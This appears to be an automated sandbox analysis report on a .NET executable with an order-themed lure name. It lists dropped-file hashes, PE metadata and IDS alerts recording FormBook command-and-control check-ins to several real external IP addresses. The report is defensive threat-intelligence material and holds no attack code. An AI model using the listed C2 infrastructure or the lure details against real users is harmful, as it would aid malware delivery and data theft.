                                                                                                                                                                            SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):98880
                                                                                                                                                                            Entropy (8bit):5.414989230634404
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                            MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                            SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                            SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                            SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):291
                                                                                                                                                                            Entropy (8bit):4.65176400421739
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                            MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                            SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                            SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                            SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (3782)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):107677
                                                                                                                                                                            Entropy (8bit):5.396220758526552
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:7nwyvB1qCo7mWUgsUopF5Xy4FlAwxdhvHcrdncqAKxwjBnKwIDQgrOChkPIgmrCp:wh6gstXy4FM5ncJKxCnKWgrd0v
                                                                                                                                                                            MD5:E8015AC436B33034EDF7DA060E853A04
                                                                                                                                                                            SHA1:62D0F6EB0E441158A1F56F6E0C70D3D229B57886
                                                                                                                                                                            SHA-256:23C953E989FF4AF6126D4A3B2AD21B33A82512FC8768045C00F05940DE2C9978
                                                                                                                                                                            SHA-512:C35AC8692FC22B78365CA202E173A90AE4B5DBA338B7FC9EEB17EDDF5868B52CF1D13DC0EDAF36BE1CC0E0152F41AC4027C51D7ECA27778B483E3FC83F11EA82
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):138356
                                                                                                                                                                            Entropy (8bit):7.809609231921042
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                            MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                            SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                            SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                            SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1753
                                                                                                                                                                            Entropy (8bit):5.8889033066924155
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                            MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                            SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                            SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                            SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9815
                                                                                                                                                                            Entropy (8bit):6.1716321262973315
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                            MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                            SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                            SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                            SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10388
                                                                                                                                                                            Entropy (8bit):6.174387413738973
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                            MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                            SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                            SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                            SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):962
                                                                                                                                                                            Entropy (8bit):5.698567446030411
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                            MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                            SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                            SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                            SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:Google Chrome extension, version 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):11185
                                                                                                                                                                            Entropy (8bit):7.951995436832936
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                            MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                            SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                            SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                            SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                            Entropy (8bit):0.1029230017316723
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:/x+ytcl1M25ytLIHFxBtvCwW+ytJU/dlRsltFll2/lsllK+ytxttT:3Wv3okFxBswWB70ql3+tsSBXt1
                                                                                                                                                                            MD5:2038AB478E726155B7355C19DCF6F0F0
                                                                                                                                                                            SHA1:AF565C228B2730E15D9BF2A41C16AF9652C944A1
                                                                                                                                                                            SHA-256:AFCA3DCAAF9704B31AB4F5CD1BC0B17F8D7603D7CBC3A854A8C0F25283495F17
                                                                                                                                                                            SHA-512:2856BEC65B8FE0DFF756B1EF165D319560B7FBDF8BF719860FAF33E03A01C92DD29824077F75A5FB76BCF6B44A38EC393706E5B486E1682A00386B4C0B5E87E9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                            Entropy (8bit):0.2364979660455589
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:3NvM7yGpSU3NvM7y8Dy+DygoDyKqDlsN2cgJ8H1C:9vqyVKvqy6yEyvy5DlsN5Ac
                                                                                                                                                                            MD5:7DA63F3349ADCE46708E4C0690063EC5
                                                                                                                                                                            SHA1:3A4B1BC2A9F48A8E4227E461B85B46F14CA69D3D
                                                                                                                                                                            SHA-256:C40819535B4185A8DB93B768A6B27657C5234D9789992D278CC01A4B3E353775
                                                                                                                                                                            SHA-512:20C16F35AFA9B663C268224BE0AC6CFCAD7F5EDD2F3903E50BA5803ECC421BF54ED974001D3F056CA8E830832C874BA53AD30B111000ECBA361B9DF18BE2265F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                            Entropy (8bit):0.2364979660455589
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:3NvM7yGpSU3NvM7y8Dy+DygoDyKqDlsN16gJ8H1C:9vqyVKvqy6yEyvy5DlsNUAc
                                                                                                                                                                            MD5:766DC8C2D2B704377A5D7A7CF489F4B1
                                                                                                                                                                            SHA1:DD1B20EA878BAC7D8AEB1A77C3EEE35429A069BE
                                                                                                                                                                            SHA-256:56669F04C60CBD07A2EE32D7B66236E4DE354EE94A1C34BAF25B6B3ED203E159
                                                                                                                                                                            SHA-512:59EAE579720FCD522F65D796101FD2B16EE20DD5D9812386436345BFE009961C3A6785F994E85AAFAEDC9F198E58BC671D367377550604CD99CF76EB88211E94
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                            Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                            Entropy (8bit):4.421800576448756
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:gSvfpi6ceLP/9skLmb0OTeWSPHaJG8nAgeMZMMhA2fX4WABlEnNq0uhiTw:LvloTeW+EZMM6DFys03w
                                                                                                                                                                            MD5:CD73CF3638BC7D14F79319EE8EE08B7D
                                                                                                                                                                            SHA1:426C552CC5DBAE0ACEAF905100B6A78F5D269EB5
                                                                                                                                                                            SHA-256:805414BC89E01B26BA606045B6B60DE48A02C6B4321BBAF83F7181AEF71C5AD3
                                                                                                                                                                            SHA-512:CA885496BF17E4D90B8F45E3A6509C8719775ABCCEA390FB17F32384229AD940D170F1FD1E9B3B0DF4353198C1FF087F0460CA76308BA004533A4DCE69846E8C
                                                                                                                                                                            Malicious:false
Preview:regf ... \AppCompat\Programs\Amcache.hve ...
                                                                                                                                                                            File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Entropy (8bit):7.997384477874889
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win64 Executable Console Net Framework (206006/5) 48.58%
                                                                                                                                                                            • Win64 Executable Console (202006/5) 47.64%
                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 2.83%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.47%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.47%
                                                                                                                                                                            File name:Nieuwebestellingen10122024.exe
                                                                                                                                                                            File size:644'232 bytes
                                                                                                                                                                            MD5:9a344f7aa0c680768aba67a0738dee2a
                                                                                                                                                                            SHA1:f7d395145a4e8b164e505971dd27c5b201f41a09
                                                                                                                                                                            SHA256:d8a46beafd4bd9945e59fbca9ad1801400b77173aa987651b8f434148bfd4d94
                                                                                                                                                                            SHA512:8f67b10f061ec8bf46657785c11e70f5bcd07f51934cf24b079c41d61cc0758870e0bd9568696c1e847a5db35fc191fbba0d0ea5d3e121dc494296fc04418f7e
                                                                                                                                                                            SSDEEP:12288:44Nx8ovpWeFMQwX+e0c1poVOFLU6ALFL7fhcHvzO6S+W+SE+xqSG6oEl:bNxjBNFOX+e0kWOFQ3fabO6SFZEgPmEl
                                                                                                                                                                            TLSH:CBD423AEAF104461C33C21BDDA4BE9C7A71DFB41C24B67648B07A99A7C9074D5BEE301
                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...fWXg.........."...0.................. ....@...... .......................`............`................................
                                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                                            Entrypoint:0x400000
                                                                                                                                                                            Entrypoint Section:
                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows cui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x67585766 [Tue Dec 10 14:59:50 2024 UTC]
                                                                                                                                                                            TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash:

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x5f6 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1ec4 | 0x2000 | 957eefeaa455b5a104dc4959345263bf | False | 0.614501953125 | data | 6.118476525832484 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0x5f6 | 0x600 | 5826f3aed3590dec1a7579511b38ce91 | False | 0.4205729166666667 | data | 4.182503871777562 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x40a0 | 0x36c | data | | | 0.3972602739726027
RT_MANIFEST | 0x440c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-11T09:40:02.370246+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49769 | 185.106.176.204 | 80 | TCP
2024-12-11T09:40:09.078114+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49927 | 3.33.130.190 | 80 | TCP
2024-12-11T09:40:11.732638+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49934 | 3.33.130.190 | 80 | TCP
2024-12-11T09:40:11.732638+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.5 | 49934 | 3.33.130.190 | 80 | TCP
2024-12-11T09:40:14.395620+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49944 | 3.33.130.190 | 80 | TCP
2024-12-11T09:40:17.046952+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49953 | 3.33.130.190 | 80 | TCP
2024-12-11T09:40:32.322160+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49989 | 5.39.10.93 | 80 | TCP
2024-12-11T09:40:34.969331+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49995 | 5.39.10.93 | 80 | TCP
2024-12-11T09:40:37.656731+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50001 | 5.39.10.93 | 80 | TCP
2024-12-11T09:40:40.345915+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50007 | 5.39.10.93 | 80 | TCP
2024-12-11T09:40:47.905990+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50029 | 194.58.112.174 | 80 | TCP
2024-12-11T09:40:50.569209+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50035 | 194.58.112.174 | 80 | TCP
2024-12-11T09:40:53.220446+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50041 | 194.58.112.174 | 80 | TCP
2024-12-11T09:40:55.872136+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50047 | 194.58.112.174 | 80 | TCP
2024-12-11T09:41:02.790862+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50069 | 209.74.64.187 | 80 | TCP
2024-12-11T09:41:05.540813+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50075 | 209.74.64.187 | 80 | TCP
2024-12-11T09:41:08.517051+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50081 | 209.74.64.187 | 80 | TCP
2024-12-11T09:41:11.129093+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50087 | 209.74.64.187 | 80 | TCP
2024-12-11T09:41:18.519515+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50103 | 3.33.130.190 | 80 | TCP
2024-12-11T09:41:20.761015+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50104 | 3.33.130.190 | 80 | TCP
2024-12-11T09:41:23.433677+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50105 | 3.33.130.190 | 80 | TCP
2024-12-11T09:41:26.093993+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50106 | 3.33.130.190 | 80 | TCP
2024-12-11T09:41:32.878997+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50107 | 3.33.130.190 | 80 | TCP
2024-12-11T09:41:35.520320+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50108 | 3.33.130.190 | 80 | TCP
2024-12-11T09:41:38.169001+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50109 | 3.33.130.190 | 80 | TCP
2024-12-11T09:41:40.819111+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50110 | 3.33.130.190 | 80 | TCP
2024-12-11T09:41:47.548276+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50111 | 3.33.130.190 | 80 | TCP
2024-12-11T09:41:50.205826+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50112 | 3.33.130.190 | 80 | TCP
2024-12-11T09:41:52.854926+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50113 | 3.33.130.190 | 80 | TCP
2024-12-11T09:41:55.509551+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50114 | 3.33.130.190 | 80 | TCP
2024-12-11T09:42:03.153642+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50115 | 47.238.157.253 | 80 | TCP
2024-12-11T09:42:05.801684+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50116 | 47.238.157.253 | 80 | TCP
2024-12-11T09:42:08.461441+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50117 | 47.238.157.253 | 80 | TCP
2024-12-11T09:42:31.499162+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50118 | 47.238.157.253 | 80 | TCP
2024-12-11T09:42:38.414739+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50119 | 67.223.117.169 | 80 | TCP
2024-12-11T09:42:41.071806+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50120 | 67.223.117.169 | 80 | TCP
2024-12-11T09:42:43.792953+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50122 | 67.223.117.169 | 80 | TCP
2024-12-11T09:42:46.383856+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50123 | 67.223.117.169 | 80 | TCP
2024-12-11T09:42:54.097807+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50124 | 85.159.66.93 | 80 | TCP
2024-12-11T09:42:56.753295+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50125 | 85.159.66.93 | 80 | TCP
2024-12-11T09:42:59.395419+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50126 | 85.159.66.93 | 80 | TCP
2024-12-11T09:43:01.879151+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50127 | 85.159.66.93 | 80 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                            Dec 11, 2024 09:39:47.456386089 CET49790443192.168.2.5172.217.19.225
                                                                                                                                                                            Dec 11, 2024 09:39:47.456414938 CET44349790172.217.19.225192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:47.465687037 CET44349790172.217.19.225192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:47.465743065 CET49790443192.168.2.5172.217.19.225
                                                                                                                                                                            Dec 11, 2024 09:39:47.465770960 CET44349790172.217.19.225192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:39:47.475344896 CET44349790172.217.19.225192.168.2.5
